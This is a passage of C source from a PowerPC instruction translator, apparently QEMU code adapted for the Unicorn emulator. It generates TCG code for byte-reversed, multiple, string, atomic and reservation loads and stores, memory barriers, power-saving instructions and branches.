cpu_gpr[rA(ctx->opcode)], EA); } tcg_temp_free(tcg_ctx, EA); } } #endif /*** Integer load and store with byte reverse ***/ /* lhbrx */ GEN_LDX(lhbr, ld16ur, 0x16, 0x18, PPC_INTEGER); /* lwbrx */ GEN_LDX(lwbr, ld32ur, 0x16, 0x10, PPC_INTEGER); #if defined(TARGET_PPC64) /* ldbrx */ GEN_LDX_E(ldbr, ld64ur_i64, 0x14, 0x10, PPC_NONE, PPC2_DBRX, CHK_NONE); /* stdbrx */ GEN_STX_E(stdbr, st64r_i64, 0x14, 0x14, PPC_NONE, PPC2_DBRX, CHK_NONE); #endif /* TARGET_PPC64 */ /* sthbrx */ GEN_STX(sthbr, st16r, 0x16, 0x1C, PPC_INTEGER); /* stwbrx */ GEN_STX(stwbr, st32r, 0x16, 0x14, PPC_INTEGER); /*** Integer load and store multiple ***/ /* lmw */ static void gen_lmw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; TCGv_i32 t1; if (ctx->le_mode) { gen_align_no_le(ctx); return; } gen_set_access_type(ctx, ACCESS_INT); t0 = tcg_temp_new(tcg_ctx); t1 = tcg_const_i32(tcg_ctx, rD(ctx->opcode)); gen_addr_imm_index(ctx, t0, 0); gen_helper_lmw(tcg_ctx, tcg_ctx->cpu_env, t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } /* stmw */ static void gen_stmw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; TCGv_i32 t1; if (ctx->le_mode) { gen_align_no_le(ctx); return; } gen_set_access_type(ctx, ACCESS_INT); t0 = tcg_temp_new(tcg_ctx); t1 = tcg_const_i32(tcg_ctx, rS(ctx->opcode)); gen_addr_imm_index(ctx, t0, 0); gen_helper_stmw(tcg_ctx, tcg_ctx->cpu_env, t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } /*** Integer load and store strings ***/ /* lswi */ /* * PowerPC32 specification says we must generate an exception if rA is * in the range of registers to be loaded. In an other hand, IBM says * this is valid, but rA won't be loaded. For now, I'll follow the * spec... */ static void gen_lswi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; TCGv_i32 t1, t2; int nb = NB(ctx->opcode); int start = rD(ctx->opcode); int ra = rA(ctx->opcode); int nr; if (ctx->le_mode) { gen_align_no_le(ctx); return; } if (nb == 0) { nb = 32; } nr = DIV_ROUND_UP(nb, 4); if (unlikely(lsw_reg_in_range(start, nr, ra))) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_LSWX); return; } gen_set_access_type(ctx, ACCESS_INT); t0 = tcg_temp_new(tcg_ctx); gen_addr_register(ctx, t0); t1 = tcg_const_i32(tcg_ctx, nb); t2 = tcg_const_i32(tcg_ctx, start); gen_helper_lsw(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2); tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); } /* lswx */ static void gen_lswx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; TCGv_i32 t1, t2, t3; if (ctx->le_mode) { gen_align_no_le(ctx); return; } gen_set_access_type(ctx, ACCESS_INT); t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); t1 = tcg_const_i32(tcg_ctx, rD(ctx->opcode)); t2 = tcg_const_i32(tcg_ctx, rA(ctx->opcode)); t3 = tcg_const_i32(tcg_ctx, rB(ctx->opcode)); gen_helper_lswx(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2, t3); tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } /* stswi */ static void gen_stswi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; TCGv_i32 t1, t2; int nb = NB(ctx->opcode); if (ctx->le_mode) { gen_align_no_le(ctx); return; } gen_set_access_type(ctx, ACCESS_INT); t0 = tcg_temp_new(tcg_ctx); gen_addr_register(ctx, t0); if (nb == 0) { nb = 32; } t1 = tcg_const_i32(tcg_ctx, nb); t2 = tcg_const_i32(tcg_ctx, rS(ctx->opcode)); gen_helper_stsw(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2); tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); } /* stswx */ static void gen_stswx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; TCGv_i32 t1, t2; if (ctx->le_mode) { gen_align_no_le(ctx); return; } gen_set_access_type(ctx, ACCESS_INT); t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t1, cpu_xer); tcg_gen_andi_i32(tcg_ctx, t1, t1, 0x7F); t2 = tcg_const_i32(tcg_ctx, rS(ctx->opcode)); gen_helper_stsw(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2); tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); } /*** Memory synchronisation ***/ /* eieio */ static void gen_eieio(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGBar bar = TCG_MO_LD_ST; /* * POWER9 has a eieio instruction variant using bit 6 as a hint to * tell the CPU it is a store-forwarding barrier. */ if (ctx->opcode & 0x2000000) { /* * ISA says that "Reserved fields in instructions are ignored * by the processor". So ignore the bit 6 on non-POWER9 CPU but * as this is not an instruction software should be using, * complain to the user. */ if (!(ctx->insns_flags2 & PPC2_ISA300)) { qemu_log_mask(LOG_GUEST_ERROR, "invalid eieio using bit 6 at @" TARGET_FMT_lx "\n", ctx->base.pc_next - 4); } else { bar = TCG_MO_ST_LD; } } tcg_gen_mb(tcg_ctx, bar | TCG_BAR_SC); } static inline void gen_check_tlb_flush(DisasContext *ctx, bool global) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t; TCGLabel *l; if (!ctx->lazy_tlb_flush) { return; } l = gen_new_label(tcg_ctx); t = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, t, tcg_ctx->cpu_env, offsetof(CPUPPCState, tlb_need_flush)); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, t, 0, l); if (global) { gen_helper_check_tlb_flush_global(tcg_ctx, tcg_ctx->cpu_env); } else { gen_helper_check_tlb_flush_local(tcg_ctx, tcg_ctx->cpu_env); } gen_set_label(tcg_ctx, l); tcg_temp_free_i32(tcg_ctx, t); } /* isync */ static void gen_isync(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* * We need to check for a pending TLB flush. This can only happen in * kernel mode however so check MSR_PR */ if (!ctx->pr) { gen_check_tlb_flush(ctx, false); } tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_SC); gen_stop_exception(ctx); } #define MEMOP_GET_SIZE(x) (1ULL << ((x) & MO_SIZE)) static void gen_load_locked(DisasContext *ctx, MemOp memop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv gpr = cpu_gpr[rD(ctx->opcode)]; TCGv t0 = tcg_temp_new(tcg_ctx); gen_set_access_type(ctx, ACCESS_RES); gen_addr_reg_index(ctx, t0); tcg_gen_qemu_ld_tl(tcg_ctx, gpr, t0, ctx->mem_idx, memop | MO_ALIGN); tcg_gen_mov_tl(tcg_ctx, cpu_reserve, t0); tcg_gen_mov_tl(tcg_ctx, cpu_reserve_val, gpr); tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_LDAQ); tcg_temp_free(tcg_ctx, t0); } #define LARX(name, memop) \ static void gen_##name(DisasContext *ctx) \ { \ gen_load_locked(ctx, memop); \ } /* lwarx */ LARX(lbarx, DEF_MEMOP(MO_UB)) LARX(lharx, DEF_MEMOP(MO_UW)) LARX(lwarx, DEF_MEMOP(MO_UL)) static void gen_fetch_inc_conditional(DisasContext *ctx, MemOp memop, TCGv EA, TCGCond cond, int addend) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); TCGv u = tcg_temp_new(tcg_ctx); tcg_gen_qemu_ld_tl(tcg_ctx, t, EA, ctx->mem_idx, memop); tcg_gen_addi_tl(tcg_ctx, t2, EA, MEMOP_GET_SIZE(memop)); tcg_gen_qemu_ld_tl(tcg_ctx, t2, t2, ctx->mem_idx, memop); tcg_gen_addi_tl(tcg_ctx, u, t, addend); /* E.g. for fetch and increment bounded... */ /* mem(EA,s) = (t != t2 ? u = t + 1 : t) */ tcg_gen_movcond_tl(tcg_ctx, cond, u, t, t2, u, t); tcg_gen_qemu_st_tl(tcg_ctx, u, EA, ctx->mem_idx, memop); /* RT = (t != t2 ? t : u = 1<<(s*8-1)) */ tcg_gen_movi_tl(tcg_ctx, u, 1ULL << (MEMOP_GET_SIZE(memop) * 8 - 1)); tcg_gen_movcond_tl(tcg_ctx, cond, cpu_gpr[rD(ctx->opcode)], t, t2, t, u); tcg_temp_free(tcg_ctx, t); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, u); } static void gen_ld_atomic(DisasContext *ctx, MemOp memop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t gpr_FC = FC(ctx->opcode); TCGv EA = tcg_temp_new(tcg_ctx); int rt = rD(ctx->opcode); bool need_serial; TCGv src, dst; gen_addr_register(ctx, EA); dst = cpu_gpr[rt]; src = cpu_gpr[(rt + 1) & 31]; need_serial = false; memop |= MO_ALIGN; switch (gpr_FC) { case 0: /* Fetch and add */ tcg_gen_atomic_fetch_add_tl(tcg_ctx, dst, EA, src, ctx->mem_idx, memop); break; case 1: /* Fetch and xor */ tcg_gen_atomic_fetch_xor_tl(tcg_ctx, dst, EA, src, ctx->mem_idx, memop); break; case 2: /* Fetch and or */ tcg_gen_atomic_fetch_or_tl(tcg_ctx, dst, EA, src, ctx->mem_idx, memop); break; case 3: /* Fetch and 'and' */ tcg_gen_atomic_fetch_and_tl(tcg_ctx, dst, EA, src, ctx->mem_idx, memop); break; case 4: /* Fetch and max unsigned */ tcg_gen_atomic_fetch_umax_tl(tcg_ctx, dst, EA, src, ctx->mem_idx, memop); break; case 5: /* Fetch and max signed */ tcg_gen_atomic_fetch_smax_tl(tcg_ctx, dst, EA, src, ctx->mem_idx, memop); break; case 6: /* Fetch and min unsigned */ tcg_gen_atomic_fetch_umin_tl(tcg_ctx, dst, EA, src, ctx->mem_idx, memop); break; case 7: /* Fetch and min signed */ tcg_gen_atomic_fetch_smin_tl(tcg_ctx, dst, EA, src, ctx->mem_idx, memop); break; case 8: /* Swap */ tcg_gen_atomic_xchg_tl(tcg_ctx, dst, EA, src, ctx->mem_idx, memop); break; case 16: /* Compare and swap not equal */ if (tb_cflags(ctx->base.tb) & CF_PARALLEL) { need_serial = true; } else { TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_qemu_ld_tl(tcg_ctx, t0, EA, ctx->mem_idx, memop); if ((memop & MO_SIZE) == MO_64 || TARGET_LONG_BITS == 32) { tcg_gen_mov_tl(tcg_ctx, t1, src); } else { tcg_gen_ext32u_tl(tcg_ctx, t1, src); } tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t0, t1, cpu_gpr[(rt + 2) & 31], t0); tcg_gen_qemu_st_tl(tcg_ctx, t1, EA, ctx->mem_idx, memop); tcg_gen_mov_tl(tcg_ctx, dst, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } break; case 24: /* Fetch and increment bounded */ if (tb_cflags(ctx->base.tb) & CF_PARALLEL) { need_serial = true; } else { gen_fetch_inc_conditional(ctx, memop, EA, TCG_COND_NE, 1); } break; case 25: /* Fetch and increment equal */ if (tb_cflags(ctx->base.tb) & CF_PARALLEL) { need_serial = true; } else { gen_fetch_inc_conditional(ctx, memop, EA, TCG_COND_EQ, 1); } break; case 28: /* Fetch and decrement bounded */ if (tb_cflags(ctx->base.tb) & CF_PARALLEL) { need_serial = true; } else { gen_fetch_inc_conditional(ctx, memop, EA, TCG_COND_NE, -1); } break; default: /* invoke data storage error handler */ gen_exception_err(ctx, POWERPC_EXCP_DSI, POWERPC_EXCP_INVAL); } tcg_temp_free(tcg_ctx, EA); if (need_serial) { /* Restart with exclusive lock. */ gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); ctx->base.is_jmp = DISAS_NORETURN; } } static void gen_lwat(DisasContext *ctx) { gen_ld_atomic(ctx, DEF_MEMOP(MO_UL)); } #ifdef TARGET_PPC64 static void gen_ldat(DisasContext *ctx) { gen_ld_atomic(ctx, DEF_MEMOP(MO_Q)); } #endif static void gen_st_atomic(DisasContext *ctx, MemOp memop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t gpr_FC = FC(ctx->opcode); TCGv EA = tcg_temp_new(tcg_ctx); TCGv src, discard; gen_addr_register(ctx, EA); src = cpu_gpr[rD(ctx->opcode)]; discard = tcg_temp_new(tcg_ctx); memop |= MO_ALIGN; switch (gpr_FC) { case 0: /* add and Store */ tcg_gen_atomic_add_fetch_tl(tcg_ctx, discard, EA, src, ctx->mem_idx, memop); break; case 1: /* xor and Store */ tcg_gen_atomic_xor_fetch_tl(tcg_ctx, discard, EA, src, ctx->mem_idx, memop); break; case 2: /* Or and Store */ tcg_gen_atomic_or_fetch_tl(tcg_ctx, discard, EA, src, ctx->mem_idx, memop); break; case 3: /* 'and' and Store */ tcg_gen_atomic_and_fetch_tl(tcg_ctx, discard, EA, src, ctx->mem_idx, memop); break; case 4: /* Store max unsigned */ tcg_gen_atomic_umax_fetch_tl(tcg_ctx, discard, EA, src, ctx->mem_idx, memop); break; case 5: /* Store max signed */ tcg_gen_atomic_smax_fetch_tl(tcg_ctx, discard, EA, src, ctx->mem_idx, memop); break; case 6: /* Store min unsigned */ tcg_gen_atomic_umin_fetch_tl(tcg_ctx, discard, EA, src, ctx->mem_idx, memop); break; case 7: /* Store min signed */ tcg_gen_atomic_smin_fetch_tl(tcg_ctx, discard, EA, src, ctx->mem_idx, memop); break; case 24: /* Store twin */ if (tb_cflags(ctx->base.tb) & CF_PARALLEL) { /* Restart with exclusive lock. */ gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); ctx->base.is_jmp = DISAS_NORETURN; } else { TCGv t = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); TCGv s = tcg_temp_new(tcg_ctx); TCGv s2 = tcg_temp_new(tcg_ctx); TCGv ea_plus_s = tcg_temp_new(tcg_ctx); tcg_gen_qemu_ld_tl(tcg_ctx, t, EA, ctx->mem_idx, memop); tcg_gen_addi_tl(tcg_ctx, ea_plus_s, EA, MEMOP_GET_SIZE(memop)); tcg_gen_qemu_ld_tl(tcg_ctx, t2, ea_plus_s, ctx->mem_idx, memop); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, s, t, t2, src, t); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, s2, t, t2, src, t2); tcg_gen_qemu_st_tl(tcg_ctx, s, EA, ctx->mem_idx, memop); tcg_gen_qemu_st_tl(tcg_ctx, s2, ea_plus_s, ctx->mem_idx, memop); tcg_temp_free(tcg_ctx, ea_plus_s); tcg_temp_free(tcg_ctx, s2); tcg_temp_free(tcg_ctx, s); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t); } break; default: /* invoke data storage error handler */ gen_exception_err(ctx, POWERPC_EXCP_DSI, POWERPC_EXCP_INVAL); } tcg_temp_free(tcg_ctx, discard); tcg_temp_free(tcg_ctx, EA); } static void gen_stwat(DisasContext *ctx) { gen_st_atomic(ctx, DEF_MEMOP(MO_UL)); } #ifdef TARGET_PPC64 static void gen_stdat(DisasContext *ctx) { gen_st_atomic(ctx, DEF_MEMOP(MO_Q)); } #endif static void gen_conditional_store(DisasContext *ctx, MemOp memop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGv t0 = tcg_temp_new(tcg_ctx); int reg = rS(ctx->opcode); gen_set_access_type(ctx, ACCESS_RES); gen_addr_reg_index(ctx, t0); tcg_gen_brcond_tl(tcg_ctx, TCG_COND_NE, t0, cpu_reserve, l1); tcg_temp_free(tcg_ctx, t0); t0 = tcg_temp_new(tcg_ctx); tcg_gen_atomic_cmpxchg_tl(tcg_ctx, t0, cpu_reserve, cpu_reserve_val, cpu_gpr[reg], ctx->mem_idx, DEF_MEMOP(memop) | MO_ALIGN); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, t0, t0, cpu_reserve_val); tcg_gen_shli_tl(tcg_ctx, t0, t0, CRF_EQ_BIT); tcg_gen_or_tl(tcg_ctx, t0, t0, cpu_so); tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[0], t0); tcg_temp_free(tcg_ctx, t0); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); /* * Address mismatch implies failure. But we still need to provide * the memory barrier semantics of the instruction. */ tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_STRL); tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[0], cpu_so); gen_set_label(tcg_ctx, l2); tcg_gen_movi_tl(tcg_ctx, cpu_reserve, -1); } #define STCX(name, memop) \ static void gen_##name(DisasContext *ctx) \ { \ gen_conditional_store(ctx, memop); \ } STCX(stbcx_, DEF_MEMOP(MO_UB)) STCX(sthcx_, DEF_MEMOP(MO_UW)) STCX(stwcx_, DEF_MEMOP(MO_UL)) #if defined(TARGET_PPC64) /* ldarx */ LARX(ldarx, DEF_MEMOP(MO_Q)) /* stdcx. */ STCX(stdcx_, DEF_MEMOP(MO_Q)) /* lqarx */ static void gen_lqarx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rd = rD(ctx->opcode); TCGv EA, hi, lo; if (unlikely((rd & 1) || (rd == rA(ctx->opcode)) || (rd == rB(ctx->opcode)))) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); return; } gen_set_access_type(ctx, ACCESS_RES); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); /* Note that the low part is always in RD+1, even in LE mode. */ lo = cpu_gpr[rd + 1]; hi = cpu_gpr[rd]; if (tb_cflags(ctx->base.tb) & CF_PARALLEL) { if (HAVE_ATOMIC128) { TCGv_i32 oi = tcg_temp_new_i32(tcg_ctx); if (ctx->le_mode) { tcg_gen_movi_i32(tcg_ctx, oi, make_memop_idx(MO_LEQ | MO_ALIGN_16, ctx->mem_idx)); gen_helper_lq_le_parallel(tcg_ctx, lo, tcg_ctx->cpu_env, EA, oi); } else { tcg_gen_movi_i32(tcg_ctx, oi, make_memop_idx(MO_BEQ | MO_ALIGN_16, ctx->mem_idx)); gen_helper_lq_be_parallel(tcg_ctx, lo, tcg_ctx->cpu_env, EA, oi); } tcg_temp_free_i32(tcg_ctx, oi); tcg_gen_ld_i64(tcg_ctx, hi, tcg_ctx->cpu_env, offsetof(CPUPPCState, retxh)); } else { /* Restart with exclusive lock. */ gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); ctx->base.is_jmp = DISAS_NORETURN; tcg_temp_free(tcg_ctx, EA); return; } } else if (ctx->le_mode) { tcg_gen_qemu_ld_i64(tcg_ctx, lo, EA, ctx->mem_idx, MO_LEQ | MO_ALIGN_16); tcg_gen_mov_tl(tcg_ctx, cpu_reserve, EA); gen_addr_add(ctx, EA, EA, 8); tcg_gen_qemu_ld_i64(tcg_ctx, hi, EA, ctx->mem_idx, MO_LEQ); } else { tcg_gen_qemu_ld_i64(tcg_ctx, hi, EA, ctx->mem_idx, MO_BEQ | MO_ALIGN_16); tcg_gen_mov_tl(tcg_ctx, cpu_reserve, EA); gen_addr_add(ctx, EA, EA, 8); tcg_gen_qemu_ld_i64(tcg_ctx, lo, EA, ctx->mem_idx, MO_BEQ); } tcg_temp_free(tcg_ctx, EA); tcg_gen_st_tl(tcg_ctx, hi, tcg_ctx->cpu_env, offsetof(CPUPPCState, reserve_val)); tcg_gen_st_tl(tcg_ctx, lo, tcg_ctx->cpu_env, offsetof(CPUPPCState, reserve_val2)); } /* stqcx. */ static void gen_stqcx_(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rs = rS(ctx->opcode); TCGv EA, hi, lo; if (unlikely(rs & 1)) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); return; } gen_set_access_type(ctx, ACCESS_RES); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); /* Note that the low part is always in RS+1, even in LE mode. */ lo = cpu_gpr[rs + 1]; hi = cpu_gpr[rs]; if (tb_cflags(ctx->base.tb) & CF_PARALLEL) { if (HAVE_CMPXCHG128) { TCGv_i32 oi = tcg_const_i32(tcg_ctx, DEF_MEMOP(MO_Q) | MO_ALIGN_16); if (ctx->le_mode) { gen_helper_stqcx_le_parallel(tcg_ctx, cpu_crf[0], tcg_ctx->cpu_env, EA, lo, hi, oi); } else { gen_helper_stqcx_be_parallel(tcg_ctx, cpu_crf[0], tcg_ctx->cpu_env, EA, lo, hi, oi); } tcg_temp_free_i32(tcg_ctx, oi); } else { /* Restart with exclusive lock. */ gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); ctx->base.is_jmp = DISAS_NORETURN; } tcg_temp_free(tcg_ctx, EA); } else { TCGLabel *lab_fail = gen_new_label(tcg_ctx); TCGLabel *lab_over = gen_new_label(tcg_ctx); TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_brcond_tl(tcg_ctx, TCG_COND_NE, EA, cpu_reserve, lab_fail); tcg_temp_free(tcg_ctx, EA); gen_qemu_ld64_i64(ctx, t0, cpu_reserve); tcg_gen_ld_i64(tcg_ctx, t1, tcg_ctx->cpu_env, (ctx->le_mode ? offsetof(CPUPPCState, reserve_val2) : offsetof(CPUPPCState, reserve_val))); tcg_gen_brcond_i64(tcg_ctx, TCG_COND_NE, t0, t1, lab_fail); tcg_gen_addi_i64(tcg_ctx, t0, cpu_reserve, 8); gen_qemu_ld64_i64(ctx, t0, t0); tcg_gen_ld_i64(tcg_ctx, t1, tcg_ctx->cpu_env, (ctx->le_mode ? offsetof(CPUPPCState, reserve_val) : offsetof(CPUPPCState, reserve_val2))); tcg_gen_brcond_i64(tcg_ctx, TCG_COND_NE, t0, t1, lab_fail); /* Success */ gen_qemu_st64_i64(ctx, ctx->le_mode ? lo : hi, cpu_reserve); tcg_gen_addi_i64(tcg_ctx, t0, cpu_reserve, 8); gen_qemu_st64_i64(ctx, ctx->le_mode ? hi : lo, t0); tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[0], cpu_so); tcg_gen_ori_i32(tcg_ctx, cpu_crf[0], cpu_crf[0], CRF_EQ); tcg_gen_br(tcg_ctx, lab_over); gen_set_label(tcg_ctx, lab_fail); tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[0], cpu_so); gen_set_label(tcg_ctx, lab_over); tcg_gen_movi_tl(tcg_ctx, cpu_reserve, -1); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } } #endif /* defined(TARGET_PPC64) */ /* sync */ static void gen_sync(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t l = (ctx->opcode >> 21) & 3; /* * We may need to check for a pending TLB flush. * * We do this on ptesync (l == 2) on ppc64 and any sync pn ppc32. * * Additionally, this can only happen in kernel mode however so * check MSR_PR as well. */ if (((l == 2) || !(ctx->insns_flags & PPC_64B)) && !ctx->pr) { gen_check_tlb_flush(ctx, true); } tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_SC); } /* wait */ static void gen_wait(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, 1); #ifdef _MSC_VER tcg_gen_st_i32(tcg_ctx, t0, tcg_ctx->cpu_env, 0 - offsetof(PowerPCCPU, env) + offsetof(CPUState, halted)); #else tcg_gen_st_i32(tcg_ctx, t0, tcg_ctx->cpu_env, -offsetof(PowerPCCPU, env) + offsetof(CPUState, halted)); #endif tcg_temp_free_i32(tcg_ctx, t0); /* Stop translation, as the CPU is supposed to sleep from now */ gen_exception_nip(ctx, EXCP_HLT, ctx->base.pc_next); } #if defined(TARGET_PPC64) static void gen_doze(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t; CHK_HV; t = tcg_const_i32(tcg_ctx, PPC_PM_DOZE); gen_helper_pminsn(tcg_ctx, tcg_ctx->cpu_env, t); tcg_temp_free_i32(tcg_ctx, t); /* Stop translation, as the CPU is supposed to sleep from now */ gen_exception_nip(ctx, EXCP_HLT, ctx->base.pc_next); } static void gen_nap(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t; CHK_HV; t = tcg_const_i32(tcg_ctx, PPC_PM_NAP); gen_helper_pminsn(tcg_ctx, tcg_ctx->cpu_env, t); tcg_temp_free_i32(tcg_ctx, t); /* Stop translation, as the CPU is supposed to sleep from now */ gen_exception_nip(ctx, EXCP_HLT, ctx->base.pc_next); } static void gen_stop(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t; CHK_HV; t = tcg_const_i32(tcg_ctx, PPC_PM_STOP); gen_helper_pminsn(tcg_ctx, tcg_ctx->cpu_env, t); tcg_temp_free_i32(tcg_ctx, t); /* Stop translation, as the CPU is supposed to sleep from now */ gen_exception_nip(ctx, EXCP_HLT, ctx->base.pc_next); } static void gen_sleep(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t; CHK_HV; t = tcg_const_i32(tcg_ctx, PPC_PM_SLEEP); gen_helper_pminsn(tcg_ctx, tcg_ctx->cpu_env, t); tcg_temp_free_i32(tcg_ctx, t); /* Stop translation, as the CPU is supposed to sleep from now */ gen_exception_nip(ctx, EXCP_HLT, ctx->base.pc_next); } static void gen_rvwinkle(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t; CHK_HV; t = tcg_const_i32(tcg_ctx, PPC_PM_RVWINKLE); gen_helper_pminsn(tcg_ctx, tcg_ctx->cpu_env, t); tcg_temp_free_i32(tcg_ctx, t); /* Stop translation, as the CPU is supposed to sleep from now */ gen_exception_nip(ctx, EXCP_HLT, ctx->base.pc_next); } #endif /* #if defined(TARGET_PPC64) */ static inline void gen_update_cfar(DisasContext *ctx, target_ulong nip) { #if defined(TARGET_PPC64) if (ctx->has_cfar) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, cpu_cfar, nip); } #endif } static inline bool use_goto_tb(DisasContext *ctx, target_ulong dest) { if (unlikely(ctx->singlestep_enabled)) { return false; } return (ctx->base.tb->pc & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK); } static void gen_lookup_and_goto_ptr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int sse = ctx->singlestep_enabled; if (unlikely(sse)) { if (sse & GDBSTUB_SINGLE_STEP) { gen_debug_exception(ctx); } else if (sse & (CPU_SINGLE_STEP | CPU_BRANCH_STEP)) { uint32_t excp = gen_prep_dbgex(ctx); gen_exception(ctx, excp); } tcg_gen_exit_tb(tcg_ctx, NULL, 0); } else { tcg_gen_lookup_and_goto_ptr(tcg_ctx); } } /*** Branch ***/ static void gen_goto_tb(DisasContext *ctx, int n, target_ulong dest) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (NARROW_MODE(ctx)) { dest = (uint32_t) dest; } if (use_goto_tb(ctx, dest)) { tcg_gen_goto_tb(tcg_ctx, n); tcg_gen_movi_tl(tcg_ctx, cpu_nip, dest & ~3); tcg_gen_exit_tb(tcg_ctx, ctx->base.tb, n); } else { tcg_gen_movi_tl(tcg_ctx, cpu_nip, dest & ~3); gen_lookup_and_goto_ptr(ctx); } } static inline void gen_setlr(DisasContext *ctx, target_ulong nip) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (NARROW_MODE(ctx)) { nip = (uint32_t)nip; } tcg_gen_movi_tl(tcg_ctx, cpu_lr, nip); } /* b ba bl bla */ static void gen_b(DisasContext *ctx) { target_ulong li, target; ctx->exception = POWERPC_EXCP_BRANCH; /* sign extend LI */ li = LI(ctx->opcode); li = (li ^ 0x02000000) - 0x02000000; if (likely(AA(ctx->opcode) == 0)) { target = ctx->base.pc_next + li - 4; } else { target = li; } if (LK(ctx->opcode)) { gen_setlr(ctx, ctx->base.pc_next); } gen_update_cfar(ctx, ctx->base.pc_next - 4); gen_goto_tb(ctx, 0, target); } #define BCOND_IM 0 #define BCOND_LR 1 #define BCOND_CTR 2 #define BCOND_TAR 3 static void gen_bcond(DisasContext *ctx, int type) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t bo = BO(ctx->opcode); TCGLabel *l1; TCGv target; 